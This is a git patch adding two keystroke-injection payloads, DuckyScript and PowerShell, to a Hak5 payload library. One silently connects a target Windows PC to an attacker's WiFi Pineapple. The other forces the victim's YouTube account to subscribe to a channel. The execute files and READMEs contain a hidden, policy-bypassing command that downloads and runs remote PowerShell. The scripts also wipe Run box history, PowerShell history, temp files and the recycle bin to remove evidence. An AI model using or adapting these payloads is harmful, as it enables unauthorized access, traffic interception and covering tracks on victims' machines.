From 259bc62d779a92e110984008775682225b42278b Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 9 May 2022 22:42:25 -0500 Subject: [PATCH] Add files via upload --- .../-OMG-PineApple/PineApple-Execute.txt | 17 +++ .../-OMG-PineApple/PineApple-KeyInjection.txt | 80 ++++++++++++++ .../general/-OMG-PineApple/PineApple.ps1 | 52 +++++++++ .../library/general/-OMG-PineApple/README.md | 102 ++++++++++++++++++ .../library/general/-OMG-Subscribe/README.md | 102 ++++++++++++++++++ .../-OMG-Subscribe/Subscribe-Execute.txt | 16 +++ .../general/-OMG-Subscribe/Subscribe.ps1 | 38 +++++++ .../general/-OMG-Subscribe/Subscribe.txt | 32 ++++++ 8 files changed, 439 insertions(+) create mode 100644 payloads/library/general/-OMG-PineApple/PineApple-Execute.txt create mode 100644 payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt create mode 100644 payloads/library/general/-OMG-PineApple/PineApple.ps1 create mode 100644 payloads/library/general/-OMG-PineApple/README.md create mode 100644 payloads/library/general/-OMG-Subscribe/README.md create mode 100644 payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt create mode 100644 payloads/library/general/-OMG-Subscribe/Subscribe.ps1 create mode 100644 payloads/library/general/-OMG-Subscribe/Subscribe.txt diff --git a/payloads/library/general/-OMG-PineApple/PineApple-Execute.txt b/payloads/library/general/-OMG-PineApple/PineApple-Execute.txt new file mode 100644 index 0000000..c95d143 --- /dev/null +++ b/payloads/library/general/-OMG-PineApple/PineApple-Execute.txt @@ -0,0 +1,17 @@ +REM Title: OMG-PineApple + +REM Author: I am Jakoby + +REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it +REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile +REM The powershell script needed is provided as OMG-PineApple.ps1 + +REM Target: Windows 10, 11 + +REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER diff --git a/payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt b/payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt new file mode 100644 index 0000000..f87c61a --- /dev/null +++ b/payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt @@ -0,0 +1,80 @@ + +REM Title: PineApple +REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it +REM This version is a direct key stroke injection attack +REM Author: I am Jakoby +REM Target: Windows 10, 11 + +DELAY 1000 + +REM If the wifi pineapple SSID is detected target PC will connect to it + +IF_PRESENT SSID="PineApple" + +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER + +STRING $profilefile="Home.xml"; +SHIFT ENTER +STRING $SSID="PineApple"; +SHIFT ENTER +STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'' +SHIFT ENTER +DELAY 500 +STRING $xmlfile=" +SHIFT ENTER +STRING +SHIFT ENTER +STRING $SSID +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING $SSIDHEX +SHIFT ENTER +STRING $SSID +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING ESS +SHIFT ENTER +STRING manual +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING open +SHIFT ENTER +STRING none +SHIFT ENTER +STRING false +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING +SHIFT ENTER +STRING " +SHIFT ENTER +STRING $XMLFILE > ($profilefile) +SHIFT ENTER +STRING netsh wlan add profile filename="$($profilefile)" +SHIFT ENTER +STRING netsh wlan connect name=$SSID +SHIFT ENTER +STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath + +DELAY 500 +ENTER diff --git a/payloads/library/general/-OMG-PineApple/PineApple.ps1 b/payloads/library/general/-OMG-PineApple/PineApple.ps1 new file mode 100644 index 0000000..7f4628a --- /dev/null +++ b/payloads/library/general/-OMG-PineApple/PineApple.ps1 @@ -0,0 +1,52 @@ +$profilefile="Home.xml" +$SSID="PineApple" +$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'' +$xmlfile=" + +$SSID + + +$SSIDHEX +$SSID + + +ESS +manual + + + +open +none +false + + + + +" +$XMLFILE > ($profilefile) +netsh wlan add profile filename="$($profilefile)" +netsh wlan connect name=$SSID + +#---------------------------------------------------------------------------------------------------- + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue diff --git a/payloads/library/general/-OMG-PineApple/README.md b/payloads/library/general/-OMG-PineApple/README.md new file mode 100644 index 0000000..91a63e8 --- /dev/null +++ b/payloads/library/general/-OMG-PineApple/README.md @@ -0,0 +1,102 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# OMG-PineApple + +A script used to connect a targets PC to your wifi PineApple + +## Description + +This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. +Depending on your method of execution the XML file will either be manually entered into a powershell window +or you may use and Invoke Web-Request to download a script to add the network profile. After either the history of +the powershell window and run box will be erased for a clean exit. + +## Getting Started + +### Dependencies + +* DropBox or another File Hosting service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Either the entire script will be manually entered into the powershell window or +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +* PS1 file to download is provided above +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-PineApple) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + + +

(back to top)

diff --git a/payloads/library/general/-OMG-Subscribe/README.md b/payloads/library/general/-OMG-Subscribe/README.md new file mode 100644 index 0000000..d1c5949 --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/README.md @@ -0,0 +1,102 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Subscribe + +A script I put together to make your target subscribe to your youtube channel + +## Description + +This script is set to run with 2 different methods. +Either you use straight keystroke injection with no dependencies +Or you use an Invoke-WebRequest to download and execute a powershell script that will do the same thing +(With the powershell script you have the ability to modify it and add other actions) +Either way your target will be directed to your youtube page where they will be made to subscribe to you + +## Getting Started + +### Dependencies + +* DropBox or other file hosting service - Your Shared link for the intended file +* Windows 10,11 +* Your target will have to be signed into their youtube account + +

(back to top)

+ +### Executing program + +* Plug in your device +* Either a straight keystroke injection will be used +* OR +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Subscribe) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt b/payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt new file mode 100644 index 0000000..da722db --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt @@ -0,0 +1,16 @@ +REM Title: Subscribe + +REM Author: I am Jakoby + +REM Description: This payload is meant to make your target subscribe to your youtube channel + +REM Target: Windows 10, 11 + +REM Remember to replace the link with your link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly + + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER diff --git a/payloads/library/general/-OMG-Subscribe/Subscribe.ps1 b/payloads/library/general/-OMG-Subscribe/Subscribe.ps1 new file mode 100644 index 0000000..f5cba26 --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/Subscribe.ps1 @@ -0,0 +1,38 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.DESCRIPTION + This program is designed to get your target to subscribe to your youtube channel +#> +############################################################################################################################################# + +# Enter your youtube channel URL here, but you should test this script with my URL first ;D + +$channel = "https://www.youtube.com/iamjakoby" + +Add-Type -AssemblyName System.Windows.Forms +$o=New-Object -ComObject WScript.Shell +$url = -join($channel,"?sub_confirmation=1") +Start-Process $url +Start-Sleep -Seconds 3 +[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2) +[System.Windows.Forms.SendKeys]::SendWait('{ENTER}') +Start-Sleep -Seconds 1 +[System.Windows.Forms.SendKeys]::SendWait('%{F4}') diff --git a/payloads/library/general/-OMG-Subscribe/Subscribe.txt b/payloads/library/general/-OMG-Subscribe/Subscribe.txt new file mode 100644 index 0000000..5142333 --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/Subscribe.txt @@ -0,0 +1,32 @@ +REM Title: OMG-Subscribe +REM Description: This payload is meant to get the owner of the target PC to subscribe to your youtube channel +REM Author: I am Jakoby +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process " + +REM put your youtube link here, you should test it out with mine first though ;D +STRING https://www.youtube.com/iamjakoby + +STRING ?sub_confirmation=1" +DELAY 500 +ENTER +DELAY 3000 +TAB +DELAY 1000 +TAB +DELAY 1000 +ENTER +DELAY 500 +ALT F4 +DELAY 1000 +GUI r +DELAY 500 + +REM This will clear their powershell and runbox history + +STRING powershell -w h -NoP -NonI -Exec Bypass reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath +DELAY 500 +ENTER